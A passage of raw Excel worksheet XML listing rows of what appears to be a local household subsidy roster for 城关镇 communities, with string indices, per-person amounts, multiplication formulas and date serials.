      </c>
      <c r="B800" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C800" s="14" t="s">
        <v>2140</v>
      </c>
      <c r="D800" s="14" t="s">
        <v>2146</v>
      </c>
      <c r="E800" s="14" t="s">
        <v>306</v>
      </c>
      <c r="F800" s="14" t="s">
        <v>289</v>
      </c>
      <c r="G800" s="14">
        <v>1</v>
      </c>
      <c r="H800" s="14">
        <v>340</v>
      </c>
      <c r="I800" s="14">
        <f t="shared" si="36"/>
        <v>340</v>
      </c>
      <c r="J800" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K800" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="801" ht="23" customHeight="1" spans="1:11">
      <c r="A801" s="13" t="s">
        <v>2147</v>
      </c>
      <c r="B801" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C801" s="14" t="s">
        <v>1565</v>
      </c>
      <c r="D801" s="14" t="s">
        <v>2148</v>
      </c>
      <c r="E801" s="14" t="s">
        <v>2149</v>
      </c>
      <c r="F801" s="14" t="s">
        <v>233</v>
      </c>
      <c r="G801" s="14">
        <v>1</v>
      </c>
      <c r="H801" s="14">
        <v>340</v>
      </c>
      <c r="I801" s="14">
        <f t="shared" si="36"/>
        <v>340</v>
      </c>
      <c r="J801" s="14">
        <v>45078</v>
      </c>
      <c r="K801" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="802" ht="23" customHeight="1" spans="1:11">
      <c r="A802" s="13" t="s">
        <v>2150</v>
      </c>
      <c r="B802" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C802" s="14" t="s">
        <v>2135</v>
      </c>
      <c r="D802" s="14" t="s">
        <v>2151</v>
      </c>
      <c r="E802" s="14" t="s">
        <v>527</v>
      </c>
      <c r="F802" s="14" t="s">
        <v>266</v>
      </c>
      <c r="G802" s="14">
        <v>1</v>
      </c>
      <c r="H802" s="14">
        <v>340</v>
      </c>
      <c r="I802" s="14">
        <f t="shared" si="36"/>
        <v>340</v>
      </c>
      <c r="J802" s="14">
        <v>45078</v>
      </c>
      <c r="K802" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="803" ht="23" customHeight="1" spans="1:11">
      <c r="A803" s="13" t="s">
        <v>2152</v>
      </c>
      <c r="B803" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C803" s="14" t="s">
        <v>2068</v>
      </c>
      <c r="D803" s="14" t="s">
        <v>2153</v>
      </c>
      <c r="E803" s="14" t="s">
        <v>2154</v>
      </c>
      <c r="F803" s="14" t="s">
        <v>223</v>
      </c>
      <c r="G803" s="14">
        <v>2</v>
      </c>
      <c r="H803" s="14">
        <v>300</v>
      </c>
      <c r="I803" s="14">
        <f t="shared" si="36"/>
        <v>600</v>
      </c>
      <c r="J803" s="14">
        <v>45078</v>
      </c>
      <c r="K803" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="804" ht="23" customHeight="1" spans="1:11">
      <c r="A804" s="13" t="s">
        <v>2155</v>
      </c>
      <c r="B804" s="14" t="str">
        <f>B803</f>
        <v>城关镇</v>
      </c>
      <c r="C804" s="14" t="str">
        <f>C803</f>
        <v>城关镇东北社区</v>
      </c>
      <c r="D804" s="18" t="s">
        <v>2156</v>
      </c>
      <c r="E804" s="18" t="s">
        <v>2157</v>
      </c>
      <c r="F804" s="14" t="str">
        <f>F803</f>
        <v>4113210103</v>
      </c>
      <c r="G804" s="14"/>
      <c r="H804" s="14"/>
      <c r="I804" s="14"/>
      <c r="J804" s="14"/>
      <c r="K804" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="805" ht="23" customHeight="1" spans="1:11">
      <c r="A805" s="13" t="s">
        <v>2158</v>
      </c>
      <c r="B805" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C805" s="14" t="s">
        <v>2135</v>
      </c>
      <c r="D805" s="14" t="s">
        <v>2159</v>
      </c>
      <c r="E805" s="14" t="s">
        <v>1198</v>
      </c>
      <c r="F805" s="14" t="s">
        <v>266</v>
      </c>
      <c r="G805" s="14">
        <v>1</v>
      </c>
      <c r="H805" s="14">
        <v>340</v>
      </c>
      <c r="I805" s="14">
        <f t="shared" ref="I805:I813" si="37">H805*G805</f>
        <v>340</v>
      </c>
      <c r="J805" s="14">
        <v>45078</v>
      </c>
      <c r="K805" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="806" ht="23" customHeight="1" spans="1:11">
      <c r="A806" s="13" t="s">
        <v>2160</v>
      </c>
      <c r="B806" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C806" s="14" t="s">
        <v>2140</v>
      </c>
      <c r="D806" s="14" t="s">
        <v>2161</v>
      </c>
      <c r="E806" s="14" t="s">
        <v>392</v>
      </c>
      <c r="F806" s="14" t="s">
        <v>289</v>
      </c>
      <c r="G806" s="14">
        <v>1</v>
      </c>
      <c r="H806" s="14">
        <v>340</v>
      </c>
      <c r="I806" s="14">
        <f t="shared" si="37"/>
        <v>340</v>
      </c>
      <c r="J806" s="14">
        <v>45078</v>
      </c>
      <c r="K806" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="807" ht="23" customHeight="1" spans="1:11">
      <c r="A807" s="13" t="s">
        <v>2162</v>
      </c>
      <c r="B807" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C807" s="14" t="s">
        <v>286</v>
      </c>
      <c r="D807" s="14" t="s">
        <v>2163</v>
      </c>
      <c r="E807" s="14" t="s">
        <v>933</v>
      </c>
      <c r="F807" s="14" t="s">
        <v>289</v>
      </c>
      <c r="G807" s="14">
        <v>1</v>
      </c>
      <c r="H807" s="14">
        <v>340</v>
      </c>
      <c r="I807" s="14">
        <f t="shared" si="37"/>
        <v>340</v>
      </c>
      <c r="J807" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K807" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="808" ht="23" customHeight="1" spans="1:11">
      <c r="A808" s="13" t="s">
        <v>2164</v>
      </c>
      <c r="B808" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C808" s="14" t="s">
        <v>1714</v>
      </c>
      <c r="D808" s="14" t="s">
        <v>2165</v>
      </c>
      <c r="E808" s="14" t="s">
        <v>779</v>
      </c>
      <c r="F808" s="14" t="s">
        <v>266</v>
      </c>
      <c r="G808" s="14">
        <v>1</v>
      </c>
      <c r="H808" s="14">
        <v>340</v>
      </c>
      <c r="I808" s="14">
        <f t="shared" si="37"/>
        <v>340</v>
      </c>
      <c r="J808" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K808" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="809" ht="23" customHeight="1" spans="1:11">
      <c r="A809" s="13" t="s">
        <v>2166</v>
      </c>
      <c r="B809" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C809" s="14" t="s">
        <v>2167</v>
      </c>
      <c r="D809" s="14" t="s">
        <v>2168</v>
      </c>
      <c r="E809" s="14" t="s">
        <v>2169</v>
      </c>
      <c r="F809" s="14" t="s">
        <v>223</v>
      </c>
      <c r="G809" s="14">
        <v>1</v>
      </c>
      <c r="H809" s="14">
        <v>340</v>
      </c>
      <c r="I809" s="14">
        <f t="shared" si="37"/>
        <v>340</v>
      </c>
      <c r="J809" s="24">
        <v>45108</v>
      </c>
      <c r="K809" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="810" ht="23" customHeight="1" spans="1:11">
      <c r="A810" s="13" t="s">
        <v>2170</v>
      </c>
      <c r="B810" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C810" s="14" t="s">
        <v>2171</v>
      </c>
      <c r="D810" s="14" t="s">
        <v>2172</v>
      </c>
      <c r="E810" s="14" t="s">
        <v>306</v>
      </c>
      <c r="F810" s="14" t="s">
        <v>223</v>
      </c>
      <c r="G810" s="14">
        <v>1</v>
      </c>
      <c r="H810" s="14">
        <v>340</v>
      </c>
      <c r="I810" s="14">
        <f t="shared" si="37"/>
        <v>340</v>
      </c>
      <c r="J810" s="24">
        <v>45108</v>
      </c>
      <c r="K810" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="811" ht="23" customHeight="1" spans="1:11">
      <c r="A811" s="13" t="s">
        <v>2173</v>
      </c>
      <c r="B811" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C811" s="14" t="s">
        <v>2174</v>
      </c>
      <c r="D811" s="14" t="s">
        <v>2175</v>
      </c>
      <c r="E811" s="14" t="s">
        <v>265</v>
      </c>
      <c r="F811" s="14" t="s">
        <v>223</v>
      </c>
      <c r="G811" s="14">
        <v>1</v>
      </c>
      <c r="H811" s="14">
        <v>340</v>
      </c>
      <c r="I811" s="14">
        <f t="shared" si="37"/>
        <v>340</v>
      </c>
      <c r="J811" s="24">
        <v>45108</v>
      </c>
      <c r="K811" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="812" ht="23" customHeight="1" spans="1:11">
      <c r="A812" s="13" t="s">
        <v>2176</v>
      </c>
      <c r="B812" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C812" s="14" t="s">
        <v>2177</v>
      </c>
      <c r="D812" s="14" t="s">
        <v>2178</v>
      </c>
      <c r="E812" s="14" t="s">
        <v>340</v>
      </c>
      <c r="F812" s="14" t="s">
        <v>223</v>
      </c>
      <c r="G812" s="14">
        <v>1</v>
      </c>
      <c r="H812" s="14">
        <v>340</v>
      </c>
      <c r="I812" s="14">
        <f t="shared" si="37"/>
        <v>340</v>
      </c>
      <c r="J812" s="24">
        <v>45108</v>
      </c>
      <c r="K812" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="813" ht="23" customHeight="1" spans="1:11">
      <c r="A813" s="13" t="s">
        <v>2179</v>
      </c>
      <c r="B813" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C813" s="14" t="s">
        <v>2180</v>
      </c>
      <c r="D813" s="14" t="s">
        <v>2181</v>
      </c>
      <c r="E813" s="14" t="s">
        <v>337</v>
      </c>
      <c r="F813" s="14" t="s">
        <v>2009</v>
      </c>
      <c r="G813" s="14">
        <v>2</v>
      </c>
      <c r="H813" s="14">
        <v>300</v>
      </c>
      <c r="I813" s="14">
        <f t="shared" si="37"/>
        <v>600</v>
      </c>
      <c r="J813" s="24">
        <v>45108</v>
      </c>
      <c r="K813" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="814" ht="23" customHeight="1" spans="1:11">
      <c r="A814" s="13" t="s">
        <v>2182</v>
      </c>
      <c r="B814" s="14" t="str">
        <f>B813</f>
        <v>城关镇</v>
      </c>
      <c r="C814" s="14" t="str">
        <f>C813</f>
        <v>南外社区中医院</v>
      </c>
      <c r="D814" s="18" t="s">
        <v>2183</v>
      </c>
      <c r="E814" s="18" t="s">
        <v>419</v>
      </c>
      <c r="F814" s="14" t="str">
        <f>F813</f>
        <v>4113210104</v>
      </c>
      <c r="G814" s="14"/>
      <c r="H814" s="14"/>
      <c r="I814" s="14"/>
      <c r="J814" s="24"/>
      <c r="K814" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="815" ht="23" customHeight="1" spans="1:11">
      <c r="A815" s="13" t="s">
        <v>2184</v>
      </c>
      <c r="B815" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C815" s="14" t="s">
        <v>2185</v>
      </c>
      <c r="D815" s="14" t="s">
        <v>2186</v>
      </c>
      <c r="E815" s="14" t="s">
        <v>1720</v>
      </c>
      <c r="F815" s="14" t="s">
        <v>2009</v>
      </c>
      <c r="G815" s="14">
        <v>3</v>
      </c>
      <c r="H815" s="14">
        <v>265</v>
      </c>
      <c r="I815" s="14">
        <f>H815*G815</f>
        <v>795</v>
      </c>
      <c r="J815" s="24">
        <v>45108</v>
      </c>
      <c r="K815" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="816" ht="23" customHeight="1" spans="1:11">
      <c r="A816" s="13" t="s">
        <v>2187</v>
      </c>
      <c r="B816" s="14" t="str">
        <f>B815</f>
        <v>城关镇</v>
      </c>
      <c r="C816" s="14" t="str">
        <f>C815</f>
        <v>南外社区印刷厂</v>
      </c>
      <c r="D816" s="13" t="s">
        <v>2188</v>
      </c>
      <c r="E816" s="13" t="s">
        <v>2189</v>
      </c>
      <c r="F816" s="14" t="str">
        <f>F815</f>
        <v>4113210104</v>
      </c>
      <c r="G816" s="14"/>
      <c r="H816" s="14"/>
      <c r="I816" s="14"/>
      <c r="J816" s="24"/>
      <c r="K816" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="817" ht="23" customHeight="1" spans="1:11">
      <c r="A817" s="13" t="s">
        <v>2190</v>
      </c>
      <c r="B817" s="14" t="str">
        <f>B816</f>
        <v>城关镇</v>
      </c>
      <c r="C817" s="14" t="str">
        <f>C816</f>
        <v>南外社区印刷厂</v>
      </c>
      <c r="D817" s="13" t="s">
        <v>2191</v>
      </c>
      <c r="E817" s="13" t="s">
        <v>2192</v>
      </c>
      <c r="F817" s="14" t="str">
        <f>F816</f>
        <v>4113210104</v>
      </c>
      <c r="G817" s="14"/>
      <c r="H817" s="14"/>
      <c r="I817" s="14"/>
      <c r="J817" s="24"/>
      <c r="K817" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="818" ht="23" customHeight="1" spans="1:11">
      <c r="A818" s="13" t="s">
        <v>2193</v>
      </c>
      <c r="B818" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C818" s="14" t="s">
        <v>2185</v>
      </c>
      <c r="D818" s="14" t="s">
        <v>2194</v>
      </c>
      <c r="E818" s="14" t="s">
        <v>2195</v>
      </c>
      <c r="F818" s="14" t="s">
        <v>2009</v>
      </c>
      <c r="G818" s="14">
        <v>2</v>
      </c>
      <c r="H818" s="14">
        <v>300</v>
      </c>
      <c r="I818" s="14">
        <f>H818*G818</f>
        <v>600</v>
      </c>
      <c r="J818" s="24">
        <v>45108</v>
      </c>
      <c r="K818" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="819" ht="23" customHeight="1" spans="1:11">
      <c r="A819" s="13" t="s">
        <v>2196</v>
      </c>
      <c r="B819" s="14" t="str">
        <f>B818</f>
        <v>城关镇</v>
      </c>
      <c r="C819" s="14" t="str">
        <f>C818</f>
        <v>南外社区印刷厂</v>
      </c>
      <c r="D819" s="18" t="s">
        <v>2197</v>
      </c>
      <c r="E819" s="18" t="s">
        <v>2198</v>
      </c>
      <c r="F819" s="14" t="str">
        <f>F818</f>
        <v>4113210104</v>
      </c>
      <c r="G819" s="14"/>
      <c r="H819" s="14"/>
      <c r="I819" s="14"/>
      <c r="J819" s="24"/>
      <c r="K819" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="820" ht="23" customHeight="1" spans="1:11">
      <c r="A820" s="13" t="s">
        <v>2199</v>
      </c>
      <c r="B820" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C820" s="14" t="s">
        <v>2185</v>
      </c>
      <c r="D820" s="14" t="s">
        <v>2200</v>
      </c>
      <c r="E820" s="14" t="s">
        <v>2201</v>
      </c>
      <c r="F820" s="14" t="s">
        <v>2009</v>
      </c>
      <c r="G820" s="14">
        <v>1</v>
      </c>
      <c r="H820" s="14">
        <v>340</v>
      </c>
      <c r="I820" s="14">
        <f>H820*G820</f>
        <v>340</v>
      </c>
      <c r="J820" s="24">
        <v>45108</v>
      </c>
      <c r="K820" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="821" ht="23" customHeight="1" spans="1:11">
      <c r="A821" s="13" t="s">
        <v>2202</v>
      </c>
      <c r="B821" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C821" s="14" t="s">
        <v>2203</v>
      </c>
      <c r="D821" s="14" t="s">
        <v>2204</v>
      </c>
      <c r="E821" s="14" t="s">
        <v>331</v>
      </c>
      <c r="F821" s="14" t="s">
        <v>2009</v>
      </c>
      <c r="G821" s="14">
        <v>1</v>
      </c>
      <c r="H821" s="14">
        <v>340</v>
      </c>
      <c r="I821" s="14">
        <f>H821*G821</f>
        <v>340</v>
      </c>
      <c r="J821" s="24">
        <v>45108</v>
      </c>
      <c r="K821" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="822" ht="23" customHeight="1" spans="1:11">
      <c r="A822" s="13" t="s">
        <v>2205</v>
      </c>
      <c r="B822" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C822" s="14" t="s">
        <v>2185</v>
      </c>
      <c r="D822" s="14" t="s">
        <v>2206</v>
      </c>
      <c r="E822" s="14" t="s">
        <v>2207</v>
      </c>
      <c r="F822" s="14" t="s">
        <v>2009</v>
      </c>
      <c r="G822" s="14">
        <v>1</v>
      </c>
      <c r="H822" s="14">
        <v>340</v>
      </c>
      <c r="I822" s="14">
        <f>H822*G822</f>
        <v>340</v>
      </c>
      <c r="J822" s="24">
        <v>45108</v>
      </c>
      <c r="K822" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="823" ht="23" customHeight="1" spans="1:11">
      <c r="A823" s="13" t="s">
        <v>2208</v>
      </c>
      <c r="B823" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C823" s="14" t="s">
        <v>2209</v>
      </c>
      <c r="D823" s="14" t="s">
        <v>2210</v>
      </c>
      <c r="E823" s="14" t="s">
        <v>548</v>
      </c>
      <c r="F823" s="14" t="s">
        <v>2009</v>
      </c>
      <c r="G823" s="14">
        <v>1</v>
      </c>
      <c r="H823" s="14">
        <v>340</v>
      </c>
      <c r="I823" s="14">
        <f>H823*G823</f>
        <v>340</v>
      </c>
      <c r="J823" s="24">
        <v>45108</v>
      </c>
      <c r="K823" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="824" ht="23" customHeight="1" spans="1:11">
      <c r="A824" s="13" t="s">
        <v>2211</v>
      </c>
      <c r="B824" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C824" s="14" t="s">
        <v>2212</v>
      </c>
      <c r="D824" s="14" t="s">
        <v>2213</v>
      </c>
      <c r="E824" s="14" t="s">
        <v>2214</v>
      </c>
      <c r="F824" s="14" t="s">
        <v>266</v>
      </c>
      <c r="G824" s="14">
        <v>2</v>
      </c>
      <c r="H824" s="14">
        <v>300</v>
      </c>
      <c r="I824" s="14">
        <f>H824*G824</f>
        <v>600</v>
      </c>
      <c r="J824" s="24">
        <v>45108</v>
      </c>
      <c r="K824" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="825" ht="23" customHeight="1" spans="1:11">
      <c r="A825" s="13" t="s">
        <v>2215</v>
      </c>
      <c r="B825" s="14" t="str">
        <f>B824</f>
        <v>城关镇</v>
      </c>
      <c r="C825" s="14" t="str">
        <f>C824</f>
        <v>西北社区商业中心</v>
      </c>
      <c r="D825" s="18" t="s">
        <v>2216</v>
      </c>
      <c r="E825" s="18" t="s">
        <v>527</v>
      </c>
      <c r="F825" s="14" t="str">
        <f>F824</f>
        <v>4113210106</v>
      </c>
      <c r="G825" s="14"/>
      <c r="H825" s="14"/>
      <c r="I825" s="14"/>
      <c r="J825" s="24"/>
      <c r="K825" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="826" ht="23" customHeight="1" spans="1:11">
      <c r="A826" s="13" t="s">
        <v>2217</v>
      </c>
      <c r="B826" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C826" s="14" t="s">
        <v>2218</v>
      </c>
      <c r="D826" s="14" t="s">
        <v>2219</v>
      </c>
      <c r="E826" s="14" t="s">
        <v>786</v>
      </c>
      <c r="F826" s="14" t="s">
        <v>266</v>
      </c>
      <c r="G826" s="14">
        <v>1</v>
      </c>
      <c r="H826" s="14">
        <v>340</v>
      </c>
      <c r="I826" s="14">
        <f t="shared" ref="I826:I831" si="38">H826*G826</f>
        <v>340</v>
      </c>
      <c r="J826" s="24">
        <v>45108</v>
      </c>
      <c r="K826" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="827" ht="23" customHeight="1" spans="1:11">
      <c r="A827" s="13" t="s">
        <v>2220</v>
      </c>
      <c r="B827" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C827" s="14" t="s">
        <v>2221</v>
      </c>
      <c r="D827" s="14" t="s">
        <v>2222</v>
      </c>
      <c r="E827" s="14" t="s">
        <v>292</v>
      </c>
      <c r="F827" s="14" t="s">
        <v>266</v>
      </c>
      <c r="G827" s="14">
        <v>1</v>
      </c>
      <c r="H827" s="14">
        <v>340</v>
      </c>
      <c r="I827" s="14">
        <f t="shared" si="38"/>
        <v>340</v>
      </c>
      <c r="J827" s="24">
        <v>45108</v>
      </c>
      <c r="K827" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="828" ht="23" customHeight="1" spans="1:11">
      <c r="A828" s="13" t="s">
        <v>2223</v>
      </c>
      <c r="B828" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C828" s="14" t="s">
        <v>2218</v>
      </c>
      <c r="D828" s="14" t="s">
        <v>2224</v>
      </c>
      <c r="E828" s="14" t="s">
        <v>2225</v>
      </c>
      <c r="F828" s="14" t="s">
        <v>266</v>
      </c>
      <c r="G828" s="14">
        <v>1</v>
      </c>
      <c r="H828" s="14">
        <v>340</v>
      </c>
      <c r="I828" s="14">
        <f t="shared" si="38"/>
        <v>340</v>
      </c>
      <c r="J828" s="24">
        <v>45108</v>
      </c>
      <c r="K828" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="829" ht="23" customHeight="1" spans="1:11">
      <c r="A829" s="13" t="s">
        <v>2226</v>
      </c>
      <c r="B829" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C829" s="14" t="s">
        <v>2221</v>
      </c>
      <c r="D829" s="14" t="s">
        <v>2227</v>
      </c>
      <c r="E829" s="14" t="s">
        <v>306</v>
      </c>
      <c r="F829" s="14" t="s">
        <v>266</v>
      </c>
      <c r="G829" s="14">
        <v>1</v>
      </c>
      <c r="H829" s="14">
        <v>340</v>
      </c>
      <c r="I829" s="14">
        <f t="shared" si="38"/>
        <v>340</v>
      </c>
      <c r="J829" s="24">
        <v>45108</v>
      </c>
      <c r="K829" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="830" ht="23" customHeight="1" spans="1:11">
      <c r="A830" s="13" t="s">
        <v>2228</v>
      </c>
      <c r="B830" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C830" s="14" t="s">
        <v>2212</v>
      </c>
      <c r="D830" s="14" t="s">
        <v>2229</v>
      </c>
      <c r="E830" s="14" t="s">
        <v>679</v>
      </c>
      <c r="F830" s="14" t="s">
        <v>266</v>
      </c>
      <c r="G830" s="14">
        <v>1</v>
      </c>
      <c r="H830" s="14">
        <v>340</v>
      </c>
      <c r="I830" s="14">
        <f t="shared" si="38"/>
        <v>340</v>
      </c>
      <c r="J830" s="24">
        <v>45108</v>
      </c>
      <c r="K830" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="831" ht="23" customHeight="1" spans="1:11">
      <c r="A831" s="13" t="s">
        <v>2230</v>
      </c>
      <c r="B831" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C831" s="14" t="s">
        <v>2231</v>
      </c>
      <c r="D831" s="14" t="s">
        <v>2232</v>
      </c>
      <c r="E831" s="14" t="s">
        <v>1212</v>
      </c>
      <c r="F831" s="14" t="s">
        <v>266</v>
      </c>
      <c r="G831" s="14">
        <v>2</v>
      </c>
      <c r="H831" s="14">
        <v>300</v>
      </c>
      <c r="I831" s="14">
        <f t="shared" si="38"/>
        <v>600</v>
      </c>
      <c r="J831" s="24">
        <v>45108</v>
      </c>
      <c r="K831" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="832" ht="23" customHeight="1" spans="1:11">
      <c r="A832" s="13" t="s">
        <v>2233</v>
      </c>
      <c r="B832" s="14" t="str">
        <f>B831</f>
        <v>城关镇</v>
      </c>
      <c r="C832" s="14" t="str">
        <f>C831</f>
        <v>西北社区教育局</v>
      </c>
      <c r="D832" s="13" t="s">
        <v>2234</v>
      </c>
      <c r="E832" s="13" t="s">
        <v>2235</v>
      </c>
      <c r="F832" s="14" t="str">
        <f>F831</f>
        <v>4113210106</v>
      </c>
      <c r="G832" s="14"/>
      <c r="H832" s="14"/>
      <c r="I832" s="14"/>
      <c r="J832" s="24"/>
      <c r="K832" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="833" ht="23" customHeight="1" spans="1:11">
      <c r="A833" s="13" t="s">
        <v>2236</v>
      </c>
      <c r="B833" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C833" s="14" t="s">
        <v>2221</v>
      </c>
      <c r="D833" s="14" t="s">
        <v>2237</v>
      </c>
      <c r="E833" s="14" t="s">
        <v>306</v>
      </c>
      <c r="F833" s="14" t="s">
        <v>266</v>
      </c>
      <c r="G833" s="14">
        <v>1</v>
      </c>
      <c r="H833" s="14">
        <v>340</v>
      </c>
      <c r="I833" s="14">
        <f t="shared" ref="I833:I872" si="39">H833*G833</f>
        <v>340</v>
      </c>
      <c r="J833" s="24">
        <v>45108</v>
      </c>
      <c r="K833" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="834" ht="23" customHeight="1" spans="1:11">
      <c r="A834" s="13" t="s">
        <v>2238</v>
      </c>
      <c r="B834" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C834" s="14" t="s">
        <v>2231</v>
      </c>
      <c r="D834" s="14" t="s">
        <v>2239</v>
      </c>
      <c r="E834" s="14" t="s">
        <v>2240</v>
      </c>
      <c r="F834" s="14" t="s">
        <v>266</v>
      </c>
      <c r="G834" s="14">
        <v>1</v>
      </c>
      <c r="H834" s="14">
        <v>340</v>
      </c>
      <c r="I834" s="14">
        <f t="shared" si="39"/>
        <v>340</v>
      </c>
      <c r="J834" s="24">
        <v>45108</v>
      </c>
      <c r="K834" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="835" ht="23" customHeight="1" spans="1:11">
      <c r="A835" s="13" t="s">
        <v>2241</v>
      </c>
      <c r="B835" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C835" s="14" t="s">
        <v>2218</v>
      </c>
      <c r="D835" s="14" t="s">
        <v>2242</v>
      </c>
      <c r="E835" s="14" t="s">
        <v>2243</v>
      </c>
      <c r="F835" s="14" t="s">
        <v>266</v>
      </c>
      <c r="G835" s="14">
        <v>1</v>
      </c>
      <c r="H835" s="14">
        <v>340</v>
      </c>
      <c r="I835" s="14">
        <f t="shared" si="39"/>
        <v>340</v>
      </c>
      <c r="J835" s="24">
        <v>45108</v>
      </c>
      <c r="K835" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="836" ht="23" customHeight="1" spans="1:11">
      <c r="A836" s="13" t="s">
        <v>2244</v>
      </c>
      <c r="B836" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C836" s="14" t="s">
        <v>2212</v>
      </c>
      <c r="D836" s="14" t="s">
        <v>2245</v>
      </c>
      <c r="E836" s="14" t="s">
        <v>385</v>
      </c>
      <c r="F836" s="14" t="s">
        <v>266</v>
      </c>
      <c r="G836" s="14">
        <v>1</v>
      </c>
      <c r="H836" s="14">
        <v>340</v>
      </c>
      <c r="I836" s="14">
        <f t="shared" si="39"/>
        <v>340</v>
      </c>
      <c r="J836" s="24">
        <v>45108</v>
      </c>
      <c r="K836" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="837" ht="23" customHeight="1" spans="1:11">
      <c r="A837" s="13" t="s">
        <v>2246</v>
      </c>
      <c r="B837" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C837" s="14" t="s">
        <v>2231</v>
      </c>
      <c r="D837" s="14" t="s">
        <v>2247</v>
      </c>
      <c r="E837" s="14" t="s">
        <v>340</v>
      </c>
      <c r="F837" s="14" t="s">
        <v>266</v>
      </c>
      <c r="G837" s="14">
        <v>1</v>
      </c>
      <c r="H837" s="14">
        <v>340</v>
      </c>
      <c r="I837" s="14">
        <f t="shared" si="39"/>
        <v>340</v>
      </c>
      <c r="J837" s="24">
        <v>45108</v>
      </c>
      <c r="K837" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="838" ht="23" customHeight="1" spans="1:11">
      <c r="A838" s="13" t="s">
        <v>2248</v>
      </c>
      <c r="B838" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C838" s="14" t="s">
        <v>2249</v>
      </c>
      <c r="D838" s="14" t="s">
        <v>2250</v>
      </c>
      <c r="E838" s="14" t="s">
        <v>408</v>
      </c>
      <c r="F838" s="14" t="s">
        <v>266</v>
      </c>
      <c r="G838" s="14">
        <v>1</v>
      </c>
      <c r="H838" s="14">
        <v>340</v>
      </c>
      <c r="I838" s="14">
        <f t="shared" si="39"/>
        <v>340</v>
      </c>
      <c r="J838" s="24">
        <v>45108</v>
      </c>
      <c r="K838" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="839" ht="23" customHeight="1" spans="1:11">
      <c r="A839" s="13" t="s">
        <v>2251</v>
      </c>
      <c r="B839" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C839" s="14" t="s">
        <v>2221</v>
      </c>
      <c r="D839" s="14" t="s">
        <v>2252</v>
      </c>
      <c r="E839" s="14" t="s">
        <v>303</v>
      </c>
      <c r="F839" s="14" t="s">
        <v>266</v>
      </c>
      <c r="G839" s="14">
        <v>1</v>
      </c>
      <c r="H839" s="14">
        <v>340</v>
      </c>
      <c r="I839" s="14">
        <f t="shared" si="39"/>
        <v>340</v>
      </c>
      <c r="J839" s="24">
        <v>45108</v>
      </c>
      <c r="K839" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="840" ht="23" customHeight="1" spans="1:11">
      <c r="A840" s="13" t="s">
        <v>2253</v>
      </c>
      <c r="B840" s="14" t="s">
        <v>219</v>
      </c>
